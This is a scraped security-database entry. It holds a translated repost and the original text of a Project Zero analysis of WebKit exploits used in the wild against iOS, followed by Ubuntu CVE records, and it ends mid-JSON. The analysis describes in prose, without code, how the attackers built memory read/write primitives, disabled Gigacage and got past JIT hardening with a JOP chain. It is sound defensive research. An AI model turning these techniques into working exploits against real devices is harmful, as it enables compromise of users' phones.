In this article, we analyze the WebKit exploits used to gain an initial, unprivileged foothold on the iOS device. All of the exploits here achieve shellcode execution inside the sandboxed renderer process (WebContent) on iOS. Although Chrome on iOS would also have been vulnerable to these browser exploits, the attackers only used them to target Safari and iPhones.
This article first briefly describes each of the exploited WebKit vulnerabilities and how the attackers build a memory read/write primitive from it, and then outlines the techniques used to gain shellcode execution and how they bypass the existing JIT code injection mitigations.
Interestingly, none of the exploits bypass the PAC-based JIT hardening that is enabled on A12 devices. The exploits are ordered by the latest iOS version each one supports, as indicated by a version check in the exploit itself. Where an exploit lacks a version check, the supported version range was guessed from the date of the fix and the preceding exploits.
The renderer exploits first gain memory read/write capabilities, then inject shellcode into the JIT region to gain native code execution. It seems that each time a new exploitable bug became available, it was exploited for read/write and then plugged into the existing exploit framework. The exploits also use common exploit techniques, for example first creating the addrof and fakeobj primitives, then faking JS objects to achieve read/write.
For many of the exploits, it is unclear whether they were originally used as 0day or as 1day. It is also unknown how the attackers first obtained knowledge of the vulnerabilities. In general, they could have found the vulnerabilities themselves or used public exploits released after a fix had shipped. For WebKit, details of a vulnerability are often available in the public source repository before the fixed version has shipped to users. CVE-2019-8518 illustrates the problem: it was publicly fixed in WebKit HEAD on February 9, 2019, with commit 4a23c92e6883. This commit contains a test case that triggers the vulnerability and causes an out-of-bounds access into a JSArray, a situation that is usually easy to exploit. However, the fix only reached users with the release of iOS 12.2 on March 25, 2019, about a month and a half after details of the vulnerability became public. A technically capable attacker holding a working exploit for an older vulnerability would need only a few days to replace the underlying vulnerability, and would thus gain the ability to exploit up-to-date devices without having to find new bugs. It is likely that this happened for at least some of the following vulnerabilities.
For comparison, here is how other browser vendors deal with this vulnerability window problem:
Google has the same problem with Chromium, for example commit 52a9e67a477b, which fixes CVE-2018-17463. However, it seems that some recent bug fixes no longer include the JavaScript test cases. For example, the following two fixes for vulnerabilities reported by our team member Sergey Glazunov: aa00ee22f8f7 for issue 1784 and 4edcc8605461 for issue 1793.
Microsoft keeps security fixes in the open source Chakra engine private until the fixes have shipped to users. The fixes are then released and published with a CVE number. For an example, see commit 7f0d390ad77d. However, it should be noted that Chakra will soon be replaced in Edge by V8 (Chromium's JavaScript engine).
Mozilla holds security fixes back from the public repository until the next release. In addition, it does not publish the JavaScript test cases used to trigger the vulnerability.
However, it is worth noting that even without a JavaScript test case, it is still possible to write a PoC from the code patch and ultimately exploit the vulnerability.
0x01 Exploit 1: iOS 10.0~10.3.2
This exploit targets CVE-2017-2505, originally reported by lokihardt as Project Zero issue 1137 and fixed in WebKit HEAD with commit 4a23c92e6883 on March 11, 2017. The fix was then shipped to users with iOS 10.3.2 on May 15. Interestingly, the exploit trigger is almost exactly the same as the bug report and the test file in the WebKit repository. This can be seen in the image below: the left side shows the test case published in the WebKit code repository, and the right side shows the part of the in-the-wild exploit code that triggers the vulnerability.
![](/Article/UploadPic/2019-9/2019917134229760.png)
The vulnerability causes an out-of-bounds write to the JSC heap with controlled data. The attackers corrupt the first QWord of a controlled JSObject, changing its Structure ID (which associates run-time type information with a JSCell) to make it appear as a Uint32Array. In this way they effectively create a fake TypedArray, which directly allows them to construct a memory read/write primitive.
0x02 Exploit 2: iOS 10.3~10.3.3
This exploit targets CVE-2017-7064 or a variant of it, which was originally found by lokihardt and reported as issue 1236. The vulnerability was fixed in WebKit HEAD with commit ad6d74945b13 on April 18, 2017, and shipped to users with iOS 10.3.3 on July 19, 2017. The vulnerability causes uninitialized memory to be treated as the content of a JS array. Through heap manipulation, the uninitialized data can be controlled; a type confusion between doubles and JSValues is then used to construct the addrof and fakeobj primitives, and memory read/write is obtained by constructing a fake TypedArray.
0x03 Exploit 3: iOS 11.0~11.3
This exploit targets WebKit bug 181867, whose CVE number might be CVE-2018-4122. It was fixed in WebKit HEAD on January 19, 2018, and shipped to users with iOS 11.3 on March 29, 2018. The vulnerability is a typical JIT side-effect issue. It is unclear how the attackers came to know of this vulnerability in early 2018. The exploit builds the addrof and fakeobj primitives by confusing unboxed double arrays with JSValue arrays, and then again obtains memory read/write by faking a typed array object.
0x04 Exploit 4: iOS 11.3~11.4.1
This exploit targets the vulnerability fixed in commit b4e567d371fd on May 16, 2018, which corresponds to WebKit bug report 185694. Unfortunately, we were unable to determine the CVE assigned to this issue, but the patch appears to have shipped to users with iOS 11.4.1 on July 9, 2018. This is another JIT side-effect issue; as with the previous vulnerability, a fakeobj primitive is constructed to fake JS objects. However, by this time the Gigacage mitigation had been released, so constructing fake ArrayBuffers / TypedArrays is no longer useful.
The exploit instead constructs a fake unboxed double Array and obtains an initial, limited memory read/write primitive. It then uses that initial primitive to disable the Gigacage mitigation, and continues to use TypedArrays for the rest of the exploit.
0x05 Exploit 5: iOS 11.4.1
This exploit targets CVE-2018-4438, reported by lokihardt as issue 1649. The vulnerability was fixed with commit 8deb8bd96f4a on October 26, 2018, and shipped to users with iOS 12.1.1 on December 5, 2018. The bug makes it possible to build an array whose prototype is a Proxy; by triggering a change from within JIT-compiled code, the bug is then turned into a JIT side-effect issue. The exploit is very similar to the previous one: it first uses the limited JS array read/write to disable the Gigacage mitigation, and then uses TypedArrays for full read/write to inject the shellcode.
Source: myhack58 (http://www.myhack58.com/Article/html/3/62/2019/96030.htm), published 2019-09-17.
{"googleprojectzero": [{"lastseen": "2021-07-30T19:22:59", "description": "Posted by Samuel Gro\u00df, Project Zero\n\n** \n** \n\n\nIn this post, we will take a look at the WebKit exploits used to gain an initial foothold onto the iOS device and stage the privilege escalation exploits. All exploits here achieve shellcode execution inside the sandboxed renderer process (WebContent) on iOS. Although Chrome on iOS would have also been vulnerable to these initial browser exploits, they were only used by the attacker to target Safari and iPhones. \n \nAfter some general discussion, this post first provides a short walkthrough of each of the exploited WebKit bugs and how the attackers construct a memory read/write primitive from them, followed by an overview of the techniques used to gain shellcode execution and how they bypassed existing JIT code injection mitigations, namely the \u201cbulletproof JIT\u201d. \n \nIt is worth noting that none of the exploits bypassed the new, PAC-based JIT hardenings that are enabled on A12 devices. The exploit writeups are sorted by the most recent iOS version the exploit supports as indicated by a version check in the exploit code itself. If that version check was missing from the exploit, the supported version range was guessed based on the date of the fix and the previous exploits. \n \nThe renderer exploits follow common practice and first gain memory read/write capabilities, then inject shellcode into the JIT region to gain native code execution. In general it seems that every time a new bug was necessary/available, the new bug was exploited for read/write and then plugged into the existing exploit framework. The exploits for the different bugs also appear to generally use common exploit techniques, e.g. by first creating [the addrof and fakeobj primitives](<http://www.phrack.org/papers/attacking_javascript_engines.html>), then faking JS objects to achieve read/write. 
\n \nFor many of the exploits it is unclear whether they were originally exploited as 0day or as 1day after a fix had already shipped. It is also unknown how the attackers obtained knowledge of the vulnerabilities in the first place. Generally they could have discovered the vulnerabilities themselves or used public exploits released after a fix had shipped. Furthermore, at least for WebKit, it is often possible to extract details of a vulnerability from the public source code repository before the fix has been shipped to users. [CVE-2019-8518](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1775>) can be used to highlight this problem (as can many other recent vulnerabilities). The vulnerability was publicly fixed in WebKit HEAD on Feb 9 2019 with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>). This commit contains a testcase that triggers the issue and causes an out-of-bounds access into a JSArray - a scenario that is usually easy to exploit. However, the fix only shipped to users with the release of iOS 12.2 on March 25 2019, roughly one and a half months after details about the vulnerability were public. An attacker in possession of a working exploit for an older WebKit vulnerability would likely only need a few days to replace the underlying vulnerability and thus gain the capability to exploit up-to-date devices without the need to find new vulnerabilities themselves. It is likely that this happened for at least some of the following exploits. \n \nFor comparison, here is how other browser vendors deal with this \u201cpatch-gap\u201d or vulnerability window problem:\n\n * Google has this same problem with Chromium (e.g. commit [52a9e67a477b](<https://chromium.googlesource.com/v8/v8.git/+/52a9e67a477bdb67ca893c25c145ef5191976220>) fixing [CVE-2018-17463](<http://www.phrack.org/papers/jit_exploitation.html>) and including a PoC trigger). 
However, it appears that some recent bugfixes no longer include the JavaScript test cases commits. For example the following two fixes for vulnerabilities reported by our team member Sergey Glazunov: [aa00ee22f8f7](<https://chromium.googlesource.com/v8/v8.git/+/aa00ee22f8f7722b505fc24acf7e544dfe59ce77>) (for issue [1784](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1784>)) and [4edcc8605461](<https://chromium.googlesource.com/v8/v8.git/+/4edcc860546157cb35940663afb9af568595888f>) (for issue [1793](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1793>)). In the latter case, only a C++ test was added that tested the new behaviour without indication of how the vulnerable code could be reached.\n\n * Microsoft keeps security fixes in the open source Chakra engine private until the fixes have been shipped to users. The security fixes are then released and marked as such with a CVE identifier. See commit [7f0d390ad77d](<https://github.com/microsoft/ChakraCore/commit/7f0d390ad77d838cbb81d4586c83ec822f384ce8>) for an example of this. However, it should be noted that Chakra will soon be replaced by V8 (Chromium\u2019s JavaScript engine) in Edge.\n\n * Mozilla appears to hold back security fixes from the public repository until somewhat close to the next release. Furthermore, the commits usually do not include the JavaScript testcases used to trigger the vulnerability.\n\n \nHowever, it is worth noting that even if no JavaScript testcase is attached to the commit, it is often still possible to reconstruct a trigger (and ultimately an exploit) for the vulnerability from the code changes and/or commit message with moderate effort. 
\n\n\n## Exploit 1: iOS 10.0 until 10.3.2\n\nThis exploit targets CVE-2017-2505 which was originally reported by lokihardt as Project Zero issue [1137](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1137>) and fixed in WebKit HEAD with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>) on Mar 11th 2017. The fix was then shipped to users with the release of iOS 10.3.2 on May 15th 2017, over two months later. \n \nOf interest, the exploit trigger is almost exactly the same as in the bug report and the regression test file in the WebKit repository. This can be seen in the following two images, the left one showing the testcase published in the WebKit code repository as part of the bugfix and the right showing the part of the in-the-wild exploit code that triggered the bug.\n\n \n \n\n\n[](<https://1.bp.blogspot.com/-PEZlVLEefs0/XWg4BdDSxkI/AAAAAAAANUs/ELjHWgzHOZIRKSTV45E-moRivJKrAWIkACLcBGAs/s1600/JSC%2BDIFF.png>)\n\n \nThe bug causes an out-of-bounds write to the JSC heap with controlled data. The attackers exploit this by corrupting the first QWord of a controlled JSObject, changing its Structure ID (which associates runtime type information with a JSCell) to make it appear as a Uint32Array instead. This way, they essentially create a fake TypedArray which directly allows them to construct a memory read/write primitive.\n\n## Exploit 2: iOS 10.3 until 10.3.3\n\nThis exploit seems to target CVE-2017-7064 (or a variant thereof), which was originally discovered by lokihardt and reported as issue [1236](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1236>). The bug was fixed in WebKit HEAD with commit [ad6d74945b13](<https://github.com/WebKit/webkit/commit/ad6d74945b13a8ca682bffe5b4e9f1c6ce0ae692>) on Apr 18th 2017 and shipped to users with the release of iOS 10.3.3 on Jul 19th 2017, over three months later. \n \nThe bug causes uninitialized memory to be treated as the content of a JS Array. 
Through standard heap manipulation techniques it is possible to control the uninitialized data, at which point it becomes possible to construct the well-known addrof and fakeobj primitives through a type confusion between doubles and JSValues and thus gain memory read/write by constructing a fake TypedArray.\n\n## Exploit 3: likely iOS 11.0 until 11.3\n\nThis exploit targets the WebKit bug [181867](<https://bugs.webkit.org/show_bug.cgi?id=181867>) which might be CVE-2018-4122. It was fixed in WebKit HEAD on Jan 19, 2018 and presumably shipped to users with the release of iOS 11.3 on Mar 29th 2018. \n \nThe bug is a classic (by 2019 standards) [JIT side-effect modelling issue](<https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf>). It remains unclear whether the attackers knew about this bug class before it started to be widely known around the beginning of 2018. The exploit again constructs the addrof and fakeobj primitives by confusing unboxed double and JSValue arrays, then gains memory read/write by again faking a typed array object.\n\n## Exploit 4: likely iOS 11.3 until 11.4.1\n\nThis exploit targets the bug fixed in commit [b4e567d371fd](<https://github.com/WebKit/webkit/commit/b4e567d371fde84474a56810a03bf3d0719aed1e>) on May 16th 2018 and corresponding to WebKit issue [185694](<https://bugs.webkit.org/show_bug.cgi?id=185694>). Unfortunately, we were unable to determine the CVE assigned to this issue, but it seems likely that the fix shipped to users with the release of iOS 11.4.1 on Jul 9th 2018. \n \nThis is another JIT side-effect modelling bug with a similar exploit to the previous one, again constructing the fakeobj primitive to fake JS objects. However, by now the [Gigacage mitigation](<https://labs.mwrinfosecurity.com/blog/some-brief-notes-on-webkit-heap-hardening/>) had shipped. As such it was no longer useful to construct fake ArrayBuffers/TypedArrays. 
Instead, the exploit constructs a fake unboxed double Array and with that gains an initial, somewhat limited memory read/write primitive. It then appears to use that initial primitive to disable the Gigacage mitigation and then continues to abuse TypedArrays to perform the rest of the exploit work.\n\n## Exploit 5: iOS 11.4.1\n\nThis exploit targets CVE-2018-4438, which was first reported by lokihardt as issue [1649](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1649>). The bug was fixed with commit [8deb8bd96f4a](<https://github.com/WebKit/webkit/commit/8deb8bd96f4a27bf8bb60334c9247cc14ceab2eb>) on Oct 26th 2018 and shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. \n \nDue to the bug, it was possible to construct an Array with a Proxy prototype that wasn\u2019t expected by the engine. It is then possible to turn this bug into an incorrect side-effect modelling issue by performing effectful changes during a proxy trap triggered (unexpectedly) in JIT compiled code. The exploit is then very similar to the previous one, first disabling the Gigacage with the limited JS Array read/write, then performing the shellcode injection with a full read/write via TypedArrays.\n\n## Exploit 6: likely iOS 12.0 until 12.1.1\n\nThis exploit targets CVE-2018-4442, which was originally discovered by lokihardt and reported as issue [1699](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1699>) and fixed in HEAD with commit [1f1683cea15c](<https://github.com/WebKit/webkit/commit/1f1683cea15c2af14710b4b73f89b55004618295>) on Oct 17th 2018. The fix then shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. \n \nIn contrast to the other bugs, this bug yields a use-after-free in the JavaScriptEngine. 
Similar to the PoC in the WebKit tracker, the attackers abuse the UaF by freeing the property backing storage of an object (the butterfly), then reclaim that storage with a [JSBoundFunction\u2019s m_boundArgs](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.h#L57>) array by repeatedly calling func.bind(). If that is successful, the attackers are now able to get access to an internal object, m_boundArgs, by loading a property from the freed object\u2019s butterfly. With that, it becomes possible to construct an OOB access by making the m_boundArgs array sparse, then calling the bound function. This will invoke [JSBoundFunction::boundArgsCopy](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.cpp#L216>) which assumes that m_boundArgs is dense and otherwise reads JSValues past the end of a buffer which it passes as argument to a controlled function (that was bound() previously). \n \nThis fact has been exploited in the past, which is why there is now a comment next to the definition of m_boundArgs: `// DO NOT allow this array to be mutated!`. From there, the attackers again construct the addrof and fakeobj primitives and reuse the rest of the exploit from before.\n\n## Exploit 7: iOS 12.1.1 until 12.1.3\n\nThe final exploit targets the same bug as exploited by Linus Henze here: [https://github.com/LinusHenze/WebKit-RegEx-Exploit](<https://github.com/LinusHenze/WebKit-RegEx-Exploit>), which is again a JIT side-effect modelling issue. The WebKit bugtracker id for it appears to be [191731](<https://bugs.webkit.org/show_bug.cgi?id=191731>). It is unclear whether a CVE number was assigned to it, but it could be CVE-2019-6217 which was disclosed during mobile Pwn2Own that year by Team Fluoroacetate. The bug seems to have been fixed on Nov 16th 2018 and shipped to users with the release of iOS 12.1.3 on Jan 22nd 2019. 
\n \nInstead of using WASM objects to gain memory read/write as Linus does, the attackers appear to instead have plugged the new bug into their old exploit and again create a fake JS Array to gain initial memory read/write capabilities, then continue the same way they did before.\n\n## Shellcode Execution\n\nAfter gaining memory read/write capabilities, the renderer exploit pivots to shellcode execution, which then performs the privilege escalation exploits. The way they achieve shellcode execution is the same in all exploits: by bypassing the JIT mitigations to overwrite an existing function\u2019s JIT code and then invoking that function. \n \nFor some time now (first announced by Apple at [BlackHat 2016](<https://www.blackhat.com/docs/us-16/materials/us-16-Krstic.pdf>) and then shipped with iOS 10), iOS features a JIT hardening measure that aims to make it more difficult for an attacker to write code directly into the RWX JIT region. It basically achieves that by creating a second, \u201chidden\u201d mapping of the JIT region that is writable and keeping the first mapping of the region non-writable. However, one weakness of this approach, and acknowledged in the presentation by Apple, is that there has to be a \u201cjit_memcpy\u201d function that is called to copy the generated code into the JIT region. As such, it remains viable to perform a ROP or JOP style attack to execute this function with controlled shellcode as argument. This is what the attackers do as well. This problem now appears to be somewhat mitigated on PAC enabled devices by signing the JIT code during code generation and verifying the signature later on. The exploits we found did not include a bypass for PAC enabled devices and instead bailed out if they ran on an A12 device. \n \nIn more detail, the attackers construct a JOP chain, consisting of three different gadgets that allow them to perform a function call of an arbitrary function with controlled arguments. 
To kick off the chain, they replace the native function pointer of the `escape` JS function with the first gadget of the chain. The chain then performs a call to the \u201cjit_memcpy\u201d function to overwrite the JIT code of a previously compiled function with the shellcode. Finally they replace the function pointer of `escape` one last time and point it to the shellcode inside the JIT region.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-29T00:00:00", "type": "googleprojectzero", "title": "\nJSC Exploits\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505", "CVE-2017-7064", "CVE-2018-17463", "CVE-2018-4122", "CVE-2018-4438", "CVE-2018-4442", "CVE-2019-6217", "CVE-2019-8518", "CVE-2019-8646"], "modified": "2019-08-29T00:00:00", "id": "GOOGLEPROJECTZERO:A46B3136EBE92DFE53548BB20EFF1ABC", "href": "https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:45:10", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to\n70.0.3538.64 
allowed a remote attacker to execute arbitrary code inside a\nsandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-11-14T00:00:00", "type": "ubuntucve", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2018-11-14T00:00:00", "id": "UB:CVE-2018-17463", "href": "https://ubuntu.com/security/CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:41:32", "description": "A logic issue existed resulting in memory corruption. This was addressed\nwith improved state management. This issue affected versions prior to iOS\n12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for\nWindows, iCloud for Windows 7.9.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4438", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2019-04-03T00:00:00", "id": "UB:CVE-2018-4438", "href": "https://ubuntu.com/security/CVE-2018-4438", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:41:18", "description": "Multiple memory corruption issues were addressed with improved memory\nhandling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari\n12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\nmaliciously crafted web content may lead to arbitrary code execution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-11T00:00:00", "type": "ubuntucve", "title": "CVE-2019-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2019-04-11T00:00:00", "id": "UB:CVE-2019-8518", "href": "https://ubuntu.com/security/CVE-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T13:50:59", "description": "An issue was discovered in certain Apple products. iOS before 11.3 is\naffected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is\naffected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is\naffected. watchOS before 4.3 is affected. The issue involves the \"WebKit\"\ncomponent. 
It allows remote attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and application crash) via a crafted\nweb site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4122", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2018-04-03T00:00:00", "id": "UB:CVE-2018-4122", "href": "https://ubuntu.com/security/CVE-2018-4122", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:59:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is\naffected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows\nis affected. iTunes before 12.6.2 on Windows is affected. The issue\ninvolves the \"WebKit\" component. 
It allows attackers to bypass intended\nmemory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2017-7064", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-20T00:00:00", "id": "UB:CVE-2017-7064", "href": "https://ubuntu.com/security/CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:01:33", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is\naffected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected.\nThe issue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-22T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2505", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-22T00:00:00", "id": "UB:CVE-2017-2505", "href": "https://ubuntu.com/security/CVE-2017-2505", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhatcve": 